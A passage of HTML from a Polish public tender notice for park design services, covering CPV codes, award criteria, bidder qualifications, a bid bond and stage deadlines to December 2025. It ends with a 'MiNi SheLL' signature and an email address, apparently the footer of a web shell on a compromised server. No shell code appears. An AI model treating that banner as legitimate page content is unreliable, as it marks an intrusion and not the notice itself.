płycie DVD w formie elektronicznej w formacie edytowalnym (.dwg doc.) i PDF z zapisem całego<br/>zakresu projektów (z opisem techn., rysunkami, zestawieniami w tabelach, itp.), zaopatrzonej w spis określający<br/>szczegółową zawartość (nazwa projektu, nazwa załącznika i nazwa pliku, na którym został zapisany). Wszystkie materiały<br/>tekstowe, takie jak opisy techniczne, tabele, należy zapisać w formatach Microsoft Word lub Microsoft Excel,<br/>3) Przedmiar robót w 2 egz. + forma elektroniczna (.ath i .pdf),<br/>4) Kosztorys inwestorski w 2 egz.+ forma elektroniczna (.ath i .pdf),<br/>5) STWiOR w 2 egz. + forma elektroniczna (.pdf i .doc)<br/>6) Wizualizacje fotorealistyczne: 1 szt. „z lotu ptaka” + 2 szt. „z poziomu człowieka” w formie elektronicznej na płycie DVD. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71240000-2 - Usługi architektoniczne, inżynieryjne i planowania</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 Pzp. w zakresie tożsamym z przedmiotem zamówienia<br/>podstawowego na poniższych warunkach:<br/>1) Stanowić będą nie więcej niż 30 % wartości zamówienia podstawowego<br/>2) Udzielone będą w okresie maksymalnie 3 lat od udzielenia zamówienia podstawowego, w sytuacji zaistnienia potrzeby ich<br/>udzielenia i posiadania przez Zamawiającego środków finansowych w zakresie opracowania dokumentacji dotyczącej<br/>projektowanego obiektu,<br/>3) Ostateczne warunki zamówienia zostaną sprecyzowanie w treści umowy, która zostanie ustalona w wyniku negocjacji między<br/>Zamawiającym, a Wykonawcą,<br/>4) zakres i wysokość kar zostanie uwzględniony odpowiednio do wartości i zakresu zamówienia publicznego,<br/>5) udzielenie zamówienia jest wyłącznym prawem Zamawiającego, a nieudzielenie takiego zamówienia nie może być podstawą<br/>roszczeń Wykonawcy o udzielenie takiego zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Projektanta posiadającego uprawnienia bez ograniczeń do projektowania w specjalności architektonicznej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) Zdolność do występowania w obrocie gospodarczym<br/>odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji<br/>o Działalności Gospodarczej o ile podmiot ubiegający się o zamówienie publiczne prowadzi działalność gospodarczą. O<br/>zamówienie publiczne mogą również ubiegać się osoby fizyczne, które nie prowadzą działalności gospodarczej, a więc nie<br/>posiadają wpisu ani do KRS, ani do CEIDG.<br/>2) Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie wymaga posiadania specjalnych kompetencji lub uprawnień.<br/>3) Sytuacja ekonomiczna i finansowa:<br/>Wykonawca powinien wykazać, że posiada:<br/>a) środki finansowe lub zdolność kredytową w wysokości min. 50 000,00 zł,<br/>b) ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia,<br/>na sumę gwarancyjną ubezpieczenia nie mniejszą niż 200.000,00 zł. W przypadku ustalenia limitu sumy gwarancyjnej<br/>ubezpieczenia na jedno zdarzenie suma ta nie może być niższa niż 200.000,00 zł.<br/>4) Zdolność techniczna lub zawodowa:<br/>a) doświadczenie Wykonawcy:<br/>Wykonawca powinien wykazać, że w ciągu ostatnich 10 lat, przed terminem składania ofert, a jeśli okres prowadzenia<br/>działalności jest krótszy, w tym okresie opracował należycie min. dwie pełno branżowe dokumentacje projektowe, które<br/>otrzymały zgodę na budowę od organu architektoniczno - budowlanego, dotyczące zagospodarowania przestrzeni parku o<br/>powierzchni min. 8 000 m2, z czego min. jedna z nich została zrealizowana.<br/>Przez pojęcie „park” Zamawiający rozumie:<br/>Teren zieleni z roślinnością wysoką i niską, urządzony z przeznaczeniem na cele wypoczynkowe ludności, wyposażony w<br/>drogi, aleje spacerowe i obiekty małej architektury takie jak ławki, place zabaw, pomniki, fontanny itp. Do powierzchni parku<br/>należy wliczyć również wody znajdujące się na terenie tego obiektu (np. stawy).<br/>Przez pojęcie „zagospodarowania przestrzeni parku” zamawiający rozumie:<br/>Budowę, przebudowę lub remont elementów stanowiących park, zgodnie z powyższą definicją.<br/>UWAGA !!! W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek, dotyczący<br/>doświadczenia musi spełniać w całości przynajmniej jeden z Wykonawców.<br/>b) dysponowania osobami:<br/>Wykonawca powinien wykazać, że będzie wstanie skierować do realizacji zamówienia publicznego niżej wymienione osoby<br/>posiadające kwalifikacje zawodowe oraz uprawnienia niezbędne<br/>do wykonania zamówienia publicznego, tj.:<br/>- min. 1 osobę posiadającą:<br/>• uprawnienia do projektowania w specjalności architektonicznej bez ograniczeń,<br/>• doświadczenie przy wykonaniu min. dwóch pełno branżowych dokumentacji projektowych, które otrzymały zgodę na<br/>budowę od organu architektoniczno-budowlanego, dotyczące zagospodarowania przestrzeni parku o powierzchni min. 8 000<br/>m2, z czego min. jedna z nich została zrealizowana.<br/>Doświadczenie ww. osoby stanowi kryterium oceny ofert w tym postępowaniu.<br/>- min. 1 osobę posiadającą:<br/>• uprawnienia do projektowania w specjalności konstrukcyjno - budowalnej bez ograniczeń.<br/>- min. 1 osobę posiadającą:<br/>• uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,<br/>gazowych, wodociągowych i kanalizacyjnych bez ograniczeń.<br/>- min. 1 osobę posiadającą:<br/>• uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń i urządzeń elektrycznych i<br/>elektronicznych bez ograniczeń.<br/>- min. 1 osobę posiadającą:<br/>• uprawnienia do projektowania w specjalności inżynieryjnej drogowej bez ograniczeń.<br/>- min. 1 osobę posiadającą:<br/>• wykształcenie średnie lub wyższe o profilu architektura krajobrazu.<br/>Informacje dodatkowe:<br/>Przez pojęcie „park” Zamawiający rozumie:<br/>Teren zieleni z roślinnością wysoką i niską, urządzony z przeznaczeniem na cele wypoczynkowe ludności, wyposażony w<br/>drogi, aleje spacerowe i obiekty małej architektury takie jak ławki, place zabaw, pomniki, fontanny itp. Do powierzchni parku<br/>należy wliczyć również wody znajdujące się na terenie tego obiektu (np. stawy).<br/>Przez pojęcie „zagospodarowania przestrzeni parku” zamawiający rozumie:<br/>Budowę, przebudowę lub remont elementów stanowiących park, zgodnie z powyższą definicją.<br/>W każdym przypadku, gdy wymagane jest posiadanie określonych uprawnień budowlanych przez osobę wskazywaną do<br/>pełnienia jakiejkolwiek funkcji wymienionej powyżej, Zamawiający dopuszcza posiadanie przez taką osobę uprawnień<br/>wydanych na podstawie wcześniej obowiązujących przepisów, o ile ich zakres odpowiada zakresowi wymaganych<br/>uprawnień lub jest szerszy.<br/>Dopuszcza się również kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy Prawo<br/>budowlane, z uwzględnieniem postanowień ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych<br/>nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2020 r., poz. 220 ze zm.) oraz ustawy z dnia 15 grudnia<br/>2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2019 r. poz. 1117 ze zm.) zgodnie z<br/>którymi przynależność do właściwej izby samorządu zawodowego nie jest wymagana od obywateli państw członkowskich<br/>Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu<br/>(EFTA).<br/>Na potwierdzenie spełniania powyższych warunków należy złożyć wykaz osób, które będą uczestniczyć w wykonywaniu<br/>zamówienia publicznego skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,<br/>doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności<br/>oraz informacją o podstawie do dysponowania tymi osobami.<br/>c) dysponowania sprzętem:<br/>Zamawiający nie stawia wymagań w tym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W przypadku podmiotów ubiegających się o zamówienie publiczne prowadzących działalność gospodarczą lub zawodową<br/>1. krajowych: odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej;<br/>2. zagranicznych: dokument potwierdzający, że jest wpisany do jednego z rejestrów zawodowych lub handlowych, prowadzonych w<br/>kraju, w którym ma siedzibę lub miejsce zamieszkania, wystawiony nie wcześniej niż 6 miesięcy przed jego złożeniem.<br/>3. Wykaz wykonanych usług potwierdzający opisany warunek wraz z dowodami potwierdzającymi należyte wykonanie tych usług - z<br/>wykorzystaniem załącznika nr 4 do SWZ.<br/>Do każdej pozycji wykazu należy załączyć dowody określające, czy wskazane usługi zostały wykonane w sposób należyty.<br/>4. Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia publicznego skierowanych przez Wykonawcę – z<br/>wykorzystaniem Załącznika nr 5 do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty wchodzące w skład oferty:<br/>1) Prawidłowo wypełniony Formularz Oferty (według załączonego druku, załącznik interaktywny do SWZ),<br/>2) Prawidłowo wypełniony przez Wykonawcę „Formularz cenowy” według załącznika nr 1 do SWZ.<br/>„Formularz ofertowy” i „Formularz cenowy” stanowią ofertę w tym postepowaniu, nie złożenie jednego z dokumentów w<br/>terminie składania ofert będzie jednoznaczne z brakiem złożenia oferty.<br/>13. Dokumenty składane wraz z ofertą:<br/>1) Oświadczenia, o których mowa w rozdziale V ust. 2 SWZ (załącznik nr 2 do SWZ). W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepoleganiu wykluczeniu składa każdy z Wykonawców;<br/>2) Oświadczenie podmiotu o udostępnieniu zasobów wskazujące na okoliczności opisane w rozdziale VII ust. 2 SWZ oraz<br/>oświadczenia podmiotu udostępniającego zasoby potwierdzające brak podstaw wykluczenia tego podmiotu oraz<br/>odpowiednio spełnianie warunków udziału<br/>w postępowaniu, o których mowa w Rozdziale VI ust. 1 i Rozdziale VII ust. 1 – jeżeli Wykonawca składający ofertę polega<br/>na zasobach innych podmiotów;<br/>3) Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego wynika jaki zakres rzeczowy<br/>wykonania zamówienia realizować zamierzają poszczególni Wykonawcy;<br/>4) Pełnomocnictwo w formie oryginału lub notarialnie poświadczonej kopii do reprezentowania wszystkich Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać<br/>przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu<br/>albo do reprezentowania w postepowaniu i zawarcia umowy;<br/>5) Pełnomocnictwo lub inne dokumenty, z których wynika prawo do podpisania oferty (oryginał lub kopia potwierdzona „za<br/>zgodność z oryginałem” przez notariusza) oraz do podpisania innych dokumentów składanych wraz z ofertą, chyba, że<br/>Zamawiający może je uzyskać w szczególności za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności<br/>rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących<br/>zadania publiczne (tj. Dz. U z 2020, poz. 346), a Wykonawca wskazał to wraz ze złożeniem oferty, o ile prawo do ich<br/>podpisania nie wynika z dokumentów złożonych wraz z ofertą.<br/>6) Formularz cenowy stanowiący Załącznik nr 1 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Przystępując do przetargu Wykonawca zobowiązany jest w terminie do składania ofert wnieść wadium: 3 000,00 zł. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku wnoszenia oferty wspólnej przez dwa lub więcej podmioty gospodarcze (konsorcja/spółki cywilne) oferta<br/>musi spełniać wymagania określone w art. 58 ustawy Prawo zamówień publicznych.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia ustanawiają Pełnomocnika do reprezentowania<br/>ich w niniejszym postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego.<br/>Pełnomocnictwo powinno być załączone do oferty celu ustalenia podmiotu uprawnionego do występowania w imieniu<br/>Wykonawców w sposób umożliwiający ich identyfikację.<br/>3. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.<br/>4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika jaki<br/>zakres rzeczowy zamówienia realizować zamierzają poszczególni Wykonawcy.<br/>5. W celu wykazania niepodlegania wykluczeniu z postępowania o udzielenie zamówienia o którym mowa w rozdziale VI<br/>wymagane jest załączenie do oferty oświadczenia i przedłożenia na wezwanie dokumentów dla każdego konsorcjanta<br/>oddzielnie.<br/>6. Zamawiający w stosunku do Wykonawców wspólnie ubiegających się o zamówienie, w odniesieniu do warunku<br/>dotyczącego zdolności technicznej lub zawodowej - dopuszcza łączne spełnienie warunku przez Wykonawców.<br/>7. W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, warunek<br/>udziału jest spełniony jeżeli Wykonawca, ubiegający się o zamówienie wspólnie z innymi wykonawcami, i który dostarcza<br/>potencjał na potrzeby spełnienia warunku udziału w postępowaniu w zakresie wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia, ma obowiązek osobiście wykonać tę część zamówienia (kluczowy zakres), dla której te zdolności są<br/>wymagane. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający zmiany postanowień zawartej z Wykonawcą umowy oraz ich warunki określił w &#34;Projekcie umowy&#34; stanowiącym Załącznik do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-11-29 12:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Za pośrednictwem Platformy e-Zamowienia, która jest dostępna pod adresem https://ezamowienia.gov.pl.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-11-29 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-12-28</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin wykonania przedmiotu zamówienia w odniesieniu do poszczególnych etapów Zadania I będzie wynosił:<br/>1) Etap 1a - przekazanie projektu budowlanego (architektoniczno – budowlanego, zagospodarowania i technicznego) – 24<br/>tygodni licząc od dnia podpisania umowy (6 miesięcy)<br/>+ 2 tygodnie na sprawdzenie i odbiór Etapu 1a.<br/>2) Etap 1b – przekazanie ostatecznego lub wykonalnego pozwolenia na budowę – 10 tygodni licząc od odbioru Etapu 1a<br/>(2,5 miesiąca).<br/>3) Etap 2 – przekazanie projektu wykonawczego, specyfikacji technicznych, przedmiarów i kosztorysów – 8 tygodni licząc od<br/>odbioru Etapu 1b (2 miesiące)<br/>+ 3 tygodnie na sprawdzenie i odbiór Etapu 2<br/>(razem wytworzenie dokumentacji i odbiory – około 47 tygodni tj. około 12 miesięcy)<br/>4) Etap 3 – nadzór autorski około 48 tygodni (około 12 miesięcy), lecz nie dłużej niż do 15 grudnia 2025 roku.<br/>3. Termin wykonania przedmiotu zamówienia w odniesieniu do poszczególnych etapów Zadania II będzie wynosił:<br/>5) Etap 1a - przekazanie projektu budowlanego (architektoniczno – budowlanego, zagospodarowania i technicznego) – 8<br/>tygodni licząc od dnia podpisania umowy (2 miesiące)<br/>+ 2 tygodnie na sprawdzenie i odbiór Etapu 1a.<br/>6) Etap 1b – przekazanie ostatecznego lub wykonalnego pozwolenia na budowę – 10 tygodni licząc od odbioru Etapu 1a<br/>(2,5 miesiąca).<br/>7) Etap 2 – przekazanie projektu wykonawczego, specyfikacji technicznych, przedmiarów i kosztorysów – 4 tygodnie licząc<br/>od odbioru Etapu 1b (1 miesiąc)<br/>+ 1 tydzień na sprawdzenie i odbiór Etapu 2<br/>(razem wytworzenie dokumentacji i odbiory – około 25 tygodni tj. około 6 miesięcy)<br/>8) Etap 3 – nadzór autorski około 48 tygodni (około 12 miesięcy), lecz nie dłużej niż do 15 grudnia 2025 roku

Creat By MiNi SheLL
Email: jattceo@gmail.com